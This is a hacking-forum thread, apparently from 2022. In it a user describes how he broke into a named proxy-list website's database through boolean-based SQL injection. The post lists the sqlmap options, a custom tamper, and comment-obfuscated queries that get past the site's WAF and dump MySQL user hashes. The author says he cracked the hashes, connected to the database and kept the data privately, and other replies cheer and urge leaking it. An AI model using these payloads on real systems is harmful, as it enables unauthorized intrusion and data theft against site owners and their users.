Since lot of people is asking for a writeup, i'm gonna make it.
I dont usually make lot of writeups so don't have lot of expectation but I will try to make my best.

(ALL DONE WITH BOOLEAN BASED SQLi)

1. There is an SQLi in https://coolproxies.com/pl/freeproxylist.php?cc=FR confirmed, and the error was showing up so this shouldn't be so difficult.

2. I started trying manually https://192.99.224.79/pl/freeproxylist.php?cc=FR because the CloudFlare WAF wasn't blocking my requests because is their backend server BUT they also have an internal WAF (pretty good btw).

3. Adding ' and '1 in the url bypassed the SQLi and I was not getting any error so that is an injection point if well used for Boolean-Based SQLi.

4. Using basic SQLMAP with                --suffix "and '1"            SQLMAP detected the SQLi but when confirming the DBMS was MYSQL I was getting blocked because of their WAF since ALL functions were getting blocked, to bypass it I created a tamper and changed

user() LIKE SYSTEM_USER()

to

USER/*a*/() LIKE USER/*a*/()

so MYSQL can go through it and detect MYSQL.

5. I opened with --sql-shell and tried some commands like "select database()", but also blocked, bypassed with:

select database/*a*/()

6. Then trying to dump users, hosts and passwords with

SELECT db FROM mysql.db LIMIT 1 OFFSET X

the word mysql was being blocked, i bypassed it using

/*INFORMATION_CHEMA*//*!mysql*/./*INFORMATION_CHEMA*//*INFORMATION_CHEMA*/db

so the query was:

SELECT db FROM /*INFORMATION_CHEMA*//*!mysql*/./*INFORMATION_CHEMA*//*INFORMATION_CHEMA*/db LIMIT 1 OFFSET

7. With that I got all the databases in like 15 min, but I wanted the whole data of the whole databases, so what I could do? Get users,hosts and passwords from mysql.user.

8. This one was harder because the words mysql, user, password, host and (again from mysql.) user were blocked, tried somethings and got the bypass using the query:
SELECT /*INFORMATION_CHEMA*//*INFORMATION_CHEMA*/{host,password or user} FROM /*INFORMATION_CHEMA*//*!mysql*/./*INFORMATION_CHEMA*//*INFORMATION_CHEMA*/user LIMIT 1 OFFSET X

9. With that I dumped all users passwords and hosts and I cracked the MYSQL hashes (not really, they were in hashes.com lol) and just connected to the db.

This is how a simple Boolean Based SQLi could lead in something more dangerous like the takeover of a database.
I will try to reply questions in the comments if I can lol

I appreciate if you rep ;D

- TartarX
Telegram: TarTarx if you need pentesting services

Nice, really did a sex on those little twinks. I found the code mixed with explanatory text a bit annoying, so try putting that on different lines.
Perhaps you could do [code] tags to make it shine thru.
Great exp sexy ;|

Congrats, very interesting to read

(June 7, 2022, 07:24 PM)Th3FatKat Wrote: Nice, really did a sex on those little twinks. I found the code mixed with explanatory text a bit annoying, so try putting that on different lines.
Perhaps you could do [code] tags to make it shine thru.
Great exp sexy ;|

I will for sure bro, thanks ;D

Great read bro

Good writeup

Congrats, i was close but stuck on tamper to dump it

Where is the Data?

congratulations and useful writeup

Oh didn't noticed this till now, that's damn awesome man, good job.

I think leaking the DB would finalize this puzzle of art!

Edit: Seems like someone had some fun with the site

(June 7, 2022, 07:56 PM)34585 Wrote: Congrats, i was close but stuck on tamper to dump it

Where is the Data?

In my private server :D

---

(June 7, 2022, 08:11 PM)420 Wrote: Oh didn't noticed this till now, that's damn awesome man, good job.

I think leaking the DB would finalize this puzzle of art!

Edit: Seems like someone had some fun with the site

Thanks 420 for start the challenge :D

Maybe I leak the db in the future, but not all, there is some data I want to keep.